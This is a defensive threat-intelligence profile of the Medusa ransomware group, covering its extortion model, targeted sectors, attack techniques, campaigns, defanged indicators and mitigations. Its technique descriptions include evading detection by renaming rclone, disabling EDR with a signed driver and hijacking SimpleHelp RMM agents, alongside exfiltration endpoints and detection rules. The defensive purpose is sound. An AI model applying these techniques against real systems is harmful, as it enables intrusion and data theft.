medusa

Medusa

also known as: Spearwing (Symantec) GOLD+BERG (SecureWorks) Frozen Spider (associated eCrime group)

Medusa is a Ransomware-as-a-Service operation first identified in June 2021 that has claimed over 300 victims across critical infrastructure sectors and nearly doubled its attack volume in early 2025. The group is distinguished by a publicly accessible Telegram channel for victim data leaks, a pay-to-delay countdown timer ($10,000 USD per 24-hour extension), and a documented case of triple extortion — where a victim who paid the ransom was contacted by a second Medusa actor demanding additional payment for the "true decryptor." The CISA/FBI/MS-ISAC joint advisory was issued March 12, 2025.

attributed origin Russia / CIS (assessed — CIS exclusion in targeting; activity on RAMP Russian-language forum)

structure Originally closed; evolved to RaaS affiliate model (mid-2024); ransom negotiations centrally controlled by developers

first observed June 2021; significant escalation from 2023 onward

primary motivation Financial — double and triple extortion; IAB recruitment model

primary targets Healthcare, Education, Legal, Insurance, Technology, Manufacturing

confirmed victims 300+ critical infrastructure victims as of February 2025 (CISA); 500+ as of January 2026 (Darktrace); 42% year-over-year increase 2023→2024

mitre att&ck group Unassigned (no formal G-number as of March 2026)

cisa advisory AA25-071A (March 12, 2025)

threat level CRITICAL — accelerating; attack volume nearly doubled in Q1 2025

Overview

Medusa emerged in June 2021 but operated quietly for its first two years before gaining significant visibility in 2023 with high-profile attacks on Minneapolis Public Schools and Toyota Financial Services. Originally a closed operation — all development and attack execution handled by the same core group — Medusa made a strategic pivot to a RaaS affiliate model in mid-2024, outsourcing initial access while retaining centralized control over the critical and most profitable component: ransom negotiation.

The IAB recruitment model is distinctive. Rather than building a traditional affiliate program where attackers pay to join, Medusa pays initial access brokers between $100 and $1 million USD for exclusive access to compromised networks — removing the initial access burden from the core team entirely and allowing operators to focus on encryption, exfiltration, and negotiation. In 2024, more than 26% of Medusa's disclosed attacks involved ransom demands exceeding $1 million USD, with demands ranging from $100,000 to $15 million and averaging approximately $1.2 million across documented incidents. Total operations have surpassed $40 million in ransom demands.

Medusa is unrelated to MedusaLocker ransomware, the Medusa mobile malware variant, and Operation Medusa (a 2023 law enforcement action against the Snake malware network). The FBI explicitly confirmed this in advisory AA25-071A. The confusion between these distinct threats is a persistent operational intelligence problem — organizations should treat them as entirely separate actors with no shared infrastructure, tooling, or operators.

The group's extortion infrastructure is operationally unusual for a ransomware group in its use of public, clearnet-accessible channels alongside dark web infrastructure. The "Medusa Blog" on Tor lists victims with countdown timers and ransom demands. A linked public Telegram channel titled "information support" — operated under the pseudonyms "Robert Vroofdown" and "Robert Enaber" — has been used to leak victim data publicly, making Medusa one of the few ransomware operations to actively maintain a clearnet presence for victim shaming. The group also maintains Facebook and X accounts under the OSINT Without Borders brand, though these are primarily used for reputation amplification rather than operational data release.

Medusa's attack volume nearly doubled in January and February 2025 compared to the same period in 2024 — a trajectory Symantec's Spearwing tracking confirmed, noting a 42% increase in incidents from 2023 to 2024 followed by further acceleration. In the UK, Medusa accounted for 9% of all reported ransomware victims in Q1 2025 — significantly above its 2% global share — suggesting either concentrated UK affiliate activity or systematic targeting of UK healthcare and insurance organizations.

triple extortion — confirmed by FBI

The CISA/FBI advisory documents a confirmed case where a victim who paid Medusa's ransom was subsequently contacted by a second Medusa actor claiming the original negotiator had stolen the ransom payment and requesting half the amount again to receive the "true decryptor." This is not a theoretical risk — it is a documented FBI investigation finding. Paying Medusa does not guarantee decryption and may invite a second extortion demand. This should factor explicitly into any incident response decision on whether to engage with ransom payment.

Target Profile

Medusa targets organizations of opportunity, with consistent overrepresentation of sectors where data sensitivity, regulatory exposure, and operational dependency on uptime create maximum payment pressure.

Healthcare and Medical: The primary growth sector through 2024–2025. Hospitals, health systems, and healthcare insurers face life-safety pressure and HIPAA regulatory exposure. The Comcast attack in 2025 — where Medusa claimed 834.4 GB of data and demanded $1.2 million — and multiple hospital network attacks demonstrate the group's willingness to target organizations where operational disruption directly affects patient care.
Education: Minneapolis Public Schools (2023) was the attack that first brought Medusa to widespread attention. The breach exposed sensitive student records for over 100,000 individuals. School districts and universities hold decades of sensitive PII across large distributed networks with limited security budgets — a profile that mirrors Vice Society's historical education targeting and drives consistent school sector attacks.
Legal and Insurance: Law firms and insurance companies hold extraordinarily sensitive client data including medical records, litigation strategy, financial information, and confidential settlements. The regulatory and reputational consequences of a public breach in these sectors are severe, driving payment consideration even when technical recovery is possible.
Technology and Manufacturing: SMBs in these sectors are preferred targets — large enough to pay meaningful ransoms, but lacking the security maturity of enterprise-scale organizations. Toyota Financial Services (2023) was the high-profile exception demonstrating Medusa's capacity against global corporations when access is available.
Government and Public Sector: Municipal governments, public school districts, and transportation agencies appear across the victim portfolio. Public sector organizations face political accountability pressure and serve populations that depend on continuous service, heightening payment urgency. In France, the Philippines, Illinois, and Texas, government agencies have all been confirmed victims.

Tactics, Techniques & Procedures

TTPs sourced from CISA/FBI/MS-ISAC joint advisory AA25-071A (March 12, 2025) and Palo Alto Unit 42 and Symantec Spearwing tracking reports. Medusa's LOTL-heavy approach and reliance on legitimate tools make it particularly resistant to signature-based detection.

mitre id	technique	description
T1190	Exploit Public-Facing Application	IABs exploit documented CVEs for initial access. CVE-2024-1709 (ConnectWise ScreenConnect authentication bypass, CVSS 10.0); CVE-2023-48788 (Fortinet EMS SQL injection, CVSS 9.8); ProxyShell Microsoft Exchange vulnerabilities (CVE-2021-34473); CVE-2025-10035 (GoAnywhere MFT License Servlet deserialization, CVSS 10.0, exploited as a zero-day by Medusa in 2025 per Microsoft research). A significant 2025 addition: Medusa exploited SimpleHelp RMM vulnerabilities CVE-2024-57726 (privilege escalation, CVSS 9.9), CVE-2024-57727 (path traversal enabling unauthenticated file download, CVSS 7.5), and CVE-2024-57728 (arbitrary file upload leading to RCE, CVSS 7.2) to compromise MSP-managed SimpleHelp servers and redirect their RMM agents to attacker-controlled C2 infrastructure — pivoting into downstream customer environments through trusted management channels. CISA added CVE-2024-57727 to its KEV catalog on February 13, 2025, and issued a dedicated advisory (AA25-163A) on SimpleHelp exploitation by ransomware actors. Patches for all three SimpleHelp CVEs were available in version 5.5.8 before active exploitation began.
T1566	Phishing	Primary credential theft method used by IABs before selling network access to Medusa. Phishing campaigns target employee credentials for VPN, email, and remote access platforms. Credential stuffing using purchased breach data supplements phishing for initial access to organizations with reused passwords.
T1046	Network Service Discovery	Advanced IP Scanner and SoftPerfect Network Scanner used for initial user, system, and network enumeration post-access. Scanned ports include FTP (21), SSH (22), Telnet (23), HTTP (80), SFTP (115), HTTPS (443), SQL (1433), Firebird (3050), HTTP proxy (3128), MySQL (3306), and RDP (3389) — a comprehensive port scan profile covering all potential lateral movement vectors.
T1059.001	PowerShell	Extensive PowerShell use across all phases: network and filesystem enumeration, defense evasion via increasing complexity of obfuscation techniques, file identification for exfiltration, and payload staging. CISA advisory documents PowerShell command history as an investigation artifact and notes actors delete it post-operation.
T1047	Windows Management Instrumentation	WMI used for system information querying, remote command execution, and persistence. Combined with PowerShell in LOTL approach that avoids deploying purpose-built malware for reconnaissance and lateral movement.
T1021.001	Remote Services: RDP	RDP used for lateral movement alongside legitimate RMM tools. Medusa actors select whichever remote access tool is already present in the victim environment — AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop have all been documented — to blend with legitimate administrator activity and evade detection based on unexpected tool introduction.
T1003	OS Credential Dumping	Mimikatz used for credential harvesting from LSASS memory, providing domain-wide credential access for unrestricted lateral movement. Certutil.exe (a native Windows binary) used as a LOTL technique for file ingress to avoid triggering download-based detection.
T1562.001	Impair Defenses: Disable or Modify Tools	Windows Defender and antivirus services disabled on specific targets before gaze.exe deployment. BYOVD technique documented: the ABYSSWORKER driver — a malicious signed kernel driver — is loaded to disable EDR at the kernel level, bypassing endpoint protection that cannot be reached by user-mode processes. This is a significant technical capability elevating Medusa beyond standard ransomware operators.
T1041	Exfiltration Over C2 Channel	Rclone used to exfiltrate data to Medusa-controlled C2 servers before encryption. In documented 2025 incidents, Medusa renamed rclone as lsp.exe to avoid detection by filename-based controls (Zensec / GBHackers). Data identified for exfiltration via PowerShell filesystem enumeration. Simultaneously used for double extortion (publication threat) and auctioned to third parties on the Medusa Blog while the countdown timer runs. Darktrace additionally documented Medusa abusing Cloudflare tunnels for C2 (connections to region1.v2.argotunnel[.]com, region2.v2.argotunnel[.]com, h2.cftunnel[.]com) — leveraging Cloudflare's legitimate infrastructure to create rate-limited tunnels that bypass static blocklists and blend with legitimate web traffic.
T1486	Data Encrypted for Impact	gaze.exe is the Medusa ransomware encryptor. It terminates services related to backups, security tools, databases, communications, file sharing, and websites. Deletes VSS shadow copies. Encrypts files with AES-256 and appends the .medusa extension. Drops ransom note !!!READ_ME_MEDUSA!!!.txt in each directory. Manually powers off and encrypts virtual machines. Deletes previously installed attack tools post-encryption to impede forensic analysis.
T1070	Indicator Removal	Post-encryption cleanup: actors delete remote access software, reconnaissance tools, credential dumping utilities, and exfiltration tools. PowerShell command history deleted. This cleanup reduces the forensic footprint available to incident responders and hampers attribution across separate Medusa incidents.

Known Campaigns

Selected confirmed and highly attributed incidents from Medusa's escalating campaign history.

Minneapolis Public Schools February 2023

Medusa's attack on Minneapolis Public Schools (MPS) — one of the largest school districts in Minnesota — exposed sensitive records for over 100,000 students, staff, and families. When MPS declined to pay the ransom, Medusa published the full stolen dataset publicly, including Social Security numbers, financial records, psychological evaluations, and details of disciplinary incidents involving minors. The group livestreamed the data publication countdown on their Telegram channel. The attack generated national attention both for its scale and for the disturbing nature of the student data exposed — including behavioral and mental health records. Recovery costs and remediation efforts consumed significant district resources for months after the incident.

Toyota Financial Services October–November 2023

Medusa claimed a breach of Toyota Financial Services, the automotive giant's financial subsidiary operating across Europe and Africa. The group exfiltrated sensitive financial and customer data and listed it on the Medusa Blog, threatening to release the full dataset unless Toyota paid. Toyota confirmed a cyberattack and took systems offline in affected regions. The incident demonstrated Medusa's capability and willingness to target Fortune Global 500 companies — not just SMBs — when access is available through an IAB.

Comcast Corporation 2025

Medusa claimed a ransomware attack on Comcast Corporation — one of the world's largest media and technology companies — stealing 834.4 GB of company data. Medusa listed the stolen data on its leak site with a $1.2 million ransom demand, threatening public release if unpaid. The group's willingness to target a company of Comcast's scale and public profile underscores the increasing ambition of Medusa operations following the mid-2024 RaaS expansion.

HCRG Care Group (UK) February 2025

Medusa attacked HCRG Care Group, one of the UK's largest independent providers of community health and social care services. The breach resulted in a London High Court injunction against DataBreaches.net — a cybersecurity journalism site — to prevent publication of details about the breach, which the US-based site ultimately disregarded on jurisdictional grounds. The legal attempt to suppress reporting on the breach drew significant attention and highlighted the tension between ransomware victims' legal tools and public interest journalism covering healthcare security.

Gateshead Council (UK) February 2025

Medusa attacked Gateshead Council in northeast England and published exfiltrated data publicly. The attack was part of a surge in UK-focused Medusa activity in early 2025 that saw the group account for 9% of all UK ransomware victims in Q1 — far above its 2% global share — suggesting concentrated affiliate activity against UK public sector and healthcare targets.

Tools & Malware

gaze.exe (encryptor): Medusa's primary ransomware binary. Terminates services for backups (Veeam), security tools (antivirus, EDR), databases (SQL, MySQL, Firebird), communications, file sharing, and websites before encrypting. Deletes VSS shadow copies. AES-256 file encryption; appends .medusa extension. Drops !!!READ_ME_MEDUSA!!!.txt ransom note per directory. Manually powers off and encrypts VMs. Deletes itself and previously installed tools post-encryption. Deployed via Sysinternals PsExec, PDQ Deploy, or BigFix for mass deployment across domain systems.
ABYSSWORKER (BYOVD driver): A malicious signed kernel driver used to disable EDR solutions at the kernel level — documented by Halcyon in Medusa operations. BYOVD bypasses user-mode endpoint protection by operating at the kernel privilege level where most EDR agents have no visibility. This capability represents a significant technical escalation beyond standard ransomware groups.
Rclone: Legitimate open-source cloud sync tool used for data exfiltration to Medusa C2 servers. Selection of a legitimate, widely used tool avoids triggering malware signature detections during the exfiltration phase.
Mimikatz: Standard Windows credential dumping tool for LSASS memory extraction, providing domain-wide credential access for lateral movement without deploying a custom credential stealer.
Advanced IP Scanner / SoftPerfect Network Scanner / netscan.exe: Legitimate network scanning tools used for post-access enumeration of the victim environment. netscan.exe was additionally documented by Zensec in Medusa's SimpleHelp-exploitation incidents for enumerating hosts and prioritizing high-value targets including domain controllers, file servers, and backup infrastructure.
AnyDesk / Atera / ConnectWise / eHorus / MeshAgent / N-able / NinjaOne / Navicat / PDQ Deploy / SimpleHelp / Splashtop / TeamViewer: Legitimate RMM tools used for lateral movement and persistent access. Medusa selects whichever tool is already present in the victim environment rather than introducing new software — a LOTL approach that makes detection based on unexpected tool installation ineffective. SimpleHelp is particularly favored: Medusa compromises SimpleHelp management servers via the CVE-2024-57726/57727/57728 chain, then edits server configuration files to redirect existing SimpleHelp RMM agents to attacker-controlled C2 infrastructure — hijacking the management trust relationship rather than deploying a new implant.
Medusa Blog (dark web DLS): Tor-hosted data leak site listing victim names, exfiltrated data samples, ransom demands with cryptocurrency wallet links, victim descriptions, and countdown timers. Simultaneously advertises data for third-party sale. Victims can pay $10,000 USD per 24-hour countdown extension. Victims can pay to have their listing removed entirely. The site displays visitor counts per victim listing as an additional psychological pressure tactic.
Telegram channel ("information support"): A public clearnet Telegram channel operated under OSINT Without Borders branding used to leak victim data publicly, making it more accessible than the Tor DLS. Created July 2021. Makes Medusa one of the few ransomware operations maintaining a public internet presence for victim shaming.

Indicators of Compromise

IOCs from CISA advisory AA25-071A (March 12, 2025) — full tables of IP addresses, domains, email accounts, and file hashes in the advisory PDF at ic3.gov/CSA/2025/250312.pdf. ConnectWise contributed to the advisory and reviewed field IOCs.

warning

Medusa IABs use diverse initial access methods — IOCs tied to specific IAB infrastructure rotate rapidly and are not Medusa-specific. Behavioral IOCs below are more durable for detection purposes than network indicators. The full advisory at cisa.gov/news-events/cybersecurity-advisories/aa25-071a contains the current operative network IOC tables from FBI investigations through February 2025.

indicators of compromise — Medusa (structural and behavioral)

file ext .medusa — appended to all encrypted files by gaze.exe

ransom note !!!READ_ME_MEDUSA!!!.txt — dropped in each directory containing encrypted files; contains victim identifier and Tor contact URL

encryptor gaze.exe — Medusa ransomware binary; deployed via PsExec, PDQ Deploy, or BigFix for mass network-wide deployment

driver (byovd) ABYSSWORKER — malicious signed kernel driver loaded to disable EDR at kernel level; alert on unexpected signed driver loads outside standard patch/update processes

behavior Mass service termination (backup, AV, database, communication services) immediately before gaze.exe execution — detectable via service stop event storm in SIEM

behavior VSS shadow copy deletion via gaze.exe pre-encryption; WMI or vssadmin invocations deleting shadow copies outside maintenance windows

tool rclone.exe — data exfiltration to C2; alert on execution outside approved cloud management contexts, especially with large outbound data volumes

vuln (exploited) CVE-2024-1709 (ConnectWise ScreenConnect auth bypass, CVSS 10.0); CVE-2023-48788 (Fortinet EMS SQLi, CVSS 9.8); CVE-2025-10035 (GoAnywhere MFT deserialization, zero-day); CVE-2024-57726/57727/57728 (SimpleHelp RMM — privilege escalation, path traversal, arbitrary file upload, affects v5.5.7 and earlier; CISA KEV Feb 2025; patch to v5.5.8+)

c2 infra Cloudflare tunnel connections: region1.v2.argotunnel[.]com, region2.v2.argotunnel[.]com, h2.cftunnel[.]com — alert on these C2 tunnel endpoints from production systems; Medusa abuses Cloudflare's legitimate infrastructure to bypass static blocklists

exfil tool rclone.exe renamed as lsp.exe — Medusa renames rclone to evade filename-based detections; alert on rclone behavior signatures regardless of process name; exfil endpoints observed: erp.ranasons[.]com (active ~Nov 2024–Sep 2025), pruebas.pintacuario[.]mx / 143.110.243[.]154, 144.217.181[.]205

full iocs Current IOC tables: CISA advisory AA25-071A — cisa.gov/news-events/cybersecurity-advisories/aa25-071a (ConnectWise contributed to this advisory)

Mitigation & Defense

Medusa's IAB-driven initial access model means the attack chain starts with a credential compromise or vulnerability exploit — often weeks before Medusa actors receive the access. Fixing the initial access vector closes the door before Medusa ever enters.

Patch SimpleHelp RMM immediately to version 5.5.8 or later: CVE-2024-57727 (SimpleHelp path traversal, CVSS 7.5) was added to CISA's KEV catalog on February 13, 2025 and is actively exploited by Medusa in supply-chain attacks against MSP environments. Medusa exploits CVE-2024-57727 combined with CVE-2024-57728 to gain administrative control of SimpleHelp management servers, then redirects existing SimpleHelp agents to attacker-controlled C2 — pivoting through the legitimate management trust relationship into downstream client environments without deploying a new implant. If your organisation uses SimpleHelp or is managed by an MSP that does, verify the server version immediately. CISA also issued a dedicated advisory (AA25-163A) on SimpleHelp exploitation by ransomware actors. Any SimpleHelp instance running version 5.5.7 or earlier that is internet-accessible should be treated as potentially compromised regardless of indicator presence.
Patch ConnectWise ScreenConnect and Fortinet EMS immediately: CVE-2024-1709 (ScreenConnect authentication bypass, CVSS 10.0) and CVE-2023-48788 (Fortinet EMS SQL injection, CVSS 9.8) are documented Medusa initial access vectors. Both have patches available. Any organization running unpatched versions of these products in internet-facing configurations is actively exposed to Medusa IAB compromise. Treat CVSS 9.0+ vulnerabilities in remote access tools as P0 patches with 24–48 hour remediation windows.
Enforce MFA on all remote access and VPN: Phishing-harvested credentials are the primary IAB initial access method. Phishing-resistant MFA (FIDO2/passkeys) prevents credential replay attacks. Standard TOTP provides partial protection. Any remote access portal accessible from the internet without MFA is an active IAB procurement target.
Monitor for ABYSSWORKER driver loads: The BYOVD technique using the ABYSSWORKER signed driver requires an unusual kernel driver load. Alert on any new kernel driver installation that is not part of an approved patch or software deployment cycle. Kernel driver change control is essential for detecting BYOVD-based EDR circumvention before encryption begins.
Alert on mass service termination events: gaze.exe terminates backup, security, database, and communication services before encryption. A sudden storm of service stop events — particularly targeting Veeam backup services, antivirus processes, and SQL services — is a reliable pre-encryption signal. Configure SIEM rules to alert on more than N service stop events within a short time window, with escalation rather than queuing for review.
Audit all legitimate RMM tool installations: Medusa selects whichever RMM tool is already in the environment for lateral movement. Maintain a strict allowlist of approved remote access software. Alert on any RMM installation (AnyDesk, SimpleHelp, eHorus, etc.) not matching the approved list. Medusa's use of pre-existing tools makes this alert high-fidelity — the tool was there legitimately, but the process that ran it may not have been.
Monitor Rclone execution and behavior regardless of process name: Alert on rclone.exe execution on systems where it is not approved software. Medusa has been documented renaming rclone as lsp.exe to bypass filename-based detections — alert on rclone behavioral signatures (cloud storage upload patterns, large outbound data volumes) independently of process name. Alert on connections to known Medusa exfiltration endpoints including erp.ranasons[.]com and pruebas.pintacuario[.]mx.
Do not pay the ransom without legal and IR counsel: The documented triple extortion case — where a paying victim was contacted for a second payment to receive the "true decryptor" — makes ransom payment a poor assumption for recovery planning. Organizations in sectors where Medusa is active (healthcare, education, legal) should have offline or immutable backup recovery capabilities sufficient to operate without the decryptor. Any ransom payment decision should involve legal counsel, IR specialists, and awareness that payment does not guarantee decryption and may trigger further extortion.
Segment backup infrastructure from production networks: gaze.exe explicitly targets Veeam backup services before encryption. Backup servers accessible from production domain networks will be enumerated and targeted. Backup credentials must not be stored or accessible from production systems. Offline or air-gapped backup copies are the only reliable post-encryption recovery mechanism.

Sources & Further Reading

— end of profile — last updated 2026-03-26